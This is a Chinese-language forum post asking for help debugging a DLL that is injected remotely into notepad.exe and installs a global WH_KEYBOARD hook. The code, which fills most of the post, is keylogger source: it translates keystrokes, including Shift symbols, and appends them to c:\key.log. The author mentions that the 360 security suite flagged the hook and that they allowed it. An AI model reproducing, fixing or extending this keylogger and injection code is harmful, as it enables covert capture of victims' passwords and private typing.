一个写在dll里面的钩子的问题。
我运用远程注入的方法,假设在进程 “notepad.exe”中注入 一个dll。
这个 dll 是用 Win32 写的。功能是:挂一个钩子,捕获键盘信息,然后把信息写入一个文件中!
问题来了: 我现在是能注入到这个进程之中, 360防护也提示有钩子安装,但是我允许安装钩子之后,然后就没反应了!
好像都没有进入到钩子的回调函数, 我在回调函数里面放了一个Messagebox 都没有效果。 这到底是为什么?
我这个钩子是能用的,我是从其他的程序上面差不多移植过来的。 求做过的朋友指导一下!
程序和系统都是x64。
代码如下:
// DLL entry point.
// On process attach it shows a message box and calls start(), which installs
// the keyboard hook; on process detach it calls stop() and shows a second
// message box. Thread attach/detach notifications are ignored and the
// function always returns TRUE.
// hinstDLL and lpvReserved are not used anywhere in this function.
// NOTE(review): start() and stop() are defined further down in this listing;
// no forward declaration is visible here.
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
switch(fdwReason)
{
case DLL_PROCESS_ATTACH:
{
// Visible dialog first, then the hook installation.
MessageBox( NULL, ("DLL已进入目标进程。"), ("信息"), MB_ICONINFORMATION );
start();
}
break;
case DLL_PROCESS_DETACH:
{
// Remove the hook before announcing the unload.
stop();
MessageBox( NULL, ("DLL已从目标进程卸载。"), ("信息"), MB_ICONINFORMATION );
}
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
}
return TRUE;
}
// Module-level state. The pragma places the initialised globals below in a
// section named "ShareData".
// NOTE(review): whether that section is actually shared between processes is
// decided by linker settings that are not part of this listing.
#pragma data_seg("ShareData")
HHOOK hKeyBoardHook=NULL; // keyboard hook handle, set by start() and released by stop()
HINSTANCE glhInstance=NULL; // module instance; never assigned or read in the visible code
HWND hOutPutWnd=NULL; // output window handle; never assigned or read in the visible code
#pragma data_seg()
// Appends exactly one byte, the one c points at, to the fixed path c:\key.log.
// The file is opened and closed on every call.
// Review/forensics notes:
//  - the fixed path c:\key.log is a stable on-disk artifact of this code;
//  - only the first byte of c is written, so an empty string produces a NUL
//    byte in the log (the caller passes "" for keys it has no mapping for);
//  - on open failure the function calls exit(1), which ends the whole process
//    the DLL is loaded in, not just this function.
void SaveLog(char*c)
{
//name.Format(_T("c:\\Key_%d_%d.log"),tm.GetMonth(),tm.GetDay());
FILE *file;
// "ab+": binary append; the file is created if it does not exist.
file=fopen("c:\\key.log","ab+");
if(file==NULL)
{
printf("错误!");
exit(1); // terminates the process this DLL is loaded in
}
//file.SeekToEnd();
// Append mode already sends every write to the end of the file.
fseek(file,0,SEEK_END);
//file.Write(c,1);
fwrite(c,1,1,file); // one element of one byte
fclose(file);
}
// WH_KEYBOARD hook procedure (registered by start()).
// For a key-down notification it maps the virtual-key code in wParam to a
// one-character string and hands it to SaveLog(); every other notification is
// only passed on.
//
// nCode  - hook code; the key is examined only when it equals HC_ACTION.
// wParam - virtual-key code of the key.
// lParam - keystroke flags (repeat count in bits 0-15, previous key state in
//          bit 30, transition state in bit 31).
// Returns the result of the CallNextHookEx call at the end of the function.
//
// Review notes:
//  - CallNextHookEx is called twice per notification: once at the top (its
//    result is stored in Result and never used) and once in the return
//    statement.
//  - A message box is shown on every invocation, before nCode is checked.
//  - Only the Shift state is consulted; keys with no case in any of the
//    switches leave sName as "" and SaveLog() is still called.
//  - `char *sName=""` binds a string literal to a non-const pointer, which
//    standard C++11 and later reject; presumably built with a permissive
//    compiler setting — confirm.
LRESULT CALLBACK LauncherHook(int nCode,WPARAM wParam,LPARAM lParam)
{
LRESULT Result=CallNextHookEx(hKeyBoardHook,nCode,wParam,lParam);
MessageBox( NULL,"我现在在回调函数中",("信息"), MB_ICONINFORMATION);
if(nCode==HC_ACTION)
{
if((lParam&0xc000ffff)==1) // key-down event: bits 30 and 31 clear, repeat count equal to 1
{
/*char key[20];
GetKeyNameText(lParam,key,20);*/
char *sName="";
// Non-zero when the high bit of the Shift key state (key currently down) is set.
BOOL b_sft=::GetAsyncKeyState (VK_SHIFT)>>((sizeof(short)*8)-1);
if(b_sft)
{
// Shift held: digits map to the symbols above them, letters to upper case.
switch(wParam)
{
case '1':sName="!"; break;
case '2':sName="@"; break;
case '3':sName = "#";break;
case '4':sName = "$";break;
case '5':sName = "%";break;
case '6':sName = "^";break;
case '7':sName = "&";break;
case '8':sName = "*";break;
case '9':sName = "(";break;
case '0':sName = ")";break;
case 'A':sName = "A";break;
case 'B':sName = "B";break;
case 'C':sName = "C";break;
case 'D':sName = "D";break;
case 'E':sName = "E";break;
case 'F':sName = "F";break;
case 'G':sName = "G";break;
case 'H':sName = "H";break;
case 'I':sName = "I";break;
case 'J':sName = "J";break;
case 'K':sName = "K";break;
case 'L':sName = "L";break;
case 'M':sName = "M";break;
case 'N':sName = "N";break;
case 'O':sName = "O";break;
case 'P':sName = "P";break;
case 'Q':sName = "Q";break;
case 'R':sName = "R";break;
case 'S':sName = "S";break;
case 'T':sName = "T";break;
case 'U':sName = "U";break;
case 'V':sName = "V";break;
case 'W':sName = "W";break;
case 'X':sName = "X";break;
case 'Y':sName = "Y";break;
case 'Z':sName = "Z";break;
//case '`':sName ="~";break;
}
}
else
{
// Shift not held: digits map to themselves, letters to lower case.
switch(wParam)
{
/*0~9*/
case '1': sName="1"; break;
case '2':sName = "2";break;
case '3':sName = "3";break;
case '4':sName = "4";break;
case '5':sName = "5";break;
case '6':sName = "6";break;
case '7':sName = "7";break;
case '8':sName = "8";break;
case '9':sName = "9";break;
case '0':sName = "0";break;
/*A~Z*/
case 'A':sName = "a";break;
case 'B':sName = "b";break;
case 'C':sName = "c";break;
case 'D':sName = "d";break;
case 'E':sName = "e";break;
case 'F':sName = "f";break;
case 'G':sName = "g";break;
case 'H':sName = "h";break;
case 'I':sName = "i";break;
case 'J':sName = "j";break;
case 'K':sName = "k";break;
case 'L':sName = "l";break;
case 'M':sName = "m";break;
case 'N':sName = "n";break;
case 'O':sName = "o";break;
case 'P':sName = "p";break;
case 'Q':sName = "q";break;
case 'R':sName = "r";break;
case 'S':sName = "s";break;
case 'T':sName = "t";break;
case 'U':sName = "u";break;
case 'V':sName = "v";break;
case 'W':sName = "w";break;
case 'X':sName = "x";break;
case 'Y':sName = "y";break;
case 'Z':sName = "z";break;
}
}
// Runs regardless of the Shift state and overrides the value chosen above.
// Backspace is recorded as "~"; there is no case for VK_NUMPAD2.
switch(wParam) // numeric keypad and a few other virtual keys
{
case VK_BACK:sName="~"; break;
case VK_NUMPAD1:sName="1";break;
case VK_NUMPAD3:sName = "3";break;
case VK_NUMPAD4:sName = "4";break;
case VK_NUMPAD5:sName = "5";break;
case VK_NUMPAD6:sName = "6";break;
case VK_NUMPAD7:sName = "7";break;
case VK_NUMPAD8:sName = "8";break;
case VK_NUMPAD9:sName = "9";break;
case VK_NUMPAD0:sName = "0";break;
case VK_MULTIPLY:sName = "*";break;
case VK_ADD: sName="+";break;
case VK_SUBTRACT: sName="-"; break;
case VK_DECIMAL: sName="."; break;
case VK_DIVIDE: sName="/"; break;
}
// Persist the mapped character (a single byte) to the log file.
SaveLog(sName);
}
}
return CallNextHookEx(hKeyBoardHook,nCode,wParam,lParam);
}
// Removes the keyboard hook whose handle is stored in hKeyBoardHook.
// The return value of UnhookWindowsHookEx is ignored, and the call is made
// even when hKeyBoardHook is still NULL (for example after a failed start()).
void stop()
{
UnhookWindowsHookEx(hKeyBoardHook);
}
// Installs LauncherHook as a WH_KEYBOARD hook and stores the handle in
// hKeyBoardHook, then reports success or failure in a message box.
// The thread id argument is 0, which requests a hook for all existing threads
// on the calling thread's desktop rather than for a single thread; this is
// the hook installation that the endpoint-protection prompt described in the
// post refers to.
// The module handle is looked up by the hard-coded name "DLLHOOK.dll".
// On failure the reason (GetLastError) is not retrieved or shown.
void start()
{
hKeyBoardHook=(HHOOK)SetWindowsHookEx(WH_KEYBOARD,(HOOKPROC)LauncherHook
,::GetModuleHandleA("DLLHOOK.dll"),0/*::GetCurrentThreadId()*/);
if(hKeyBoardHook==NULL)
{
MessageBox( NULL, ("钩子安装失败。"), ("信息"), MB_ICONINFORMATION );
}
else
{
MessageBox( NULL, ("钩子安装成功。"), ("信息"), MB_ICONINFORMATION );
}
}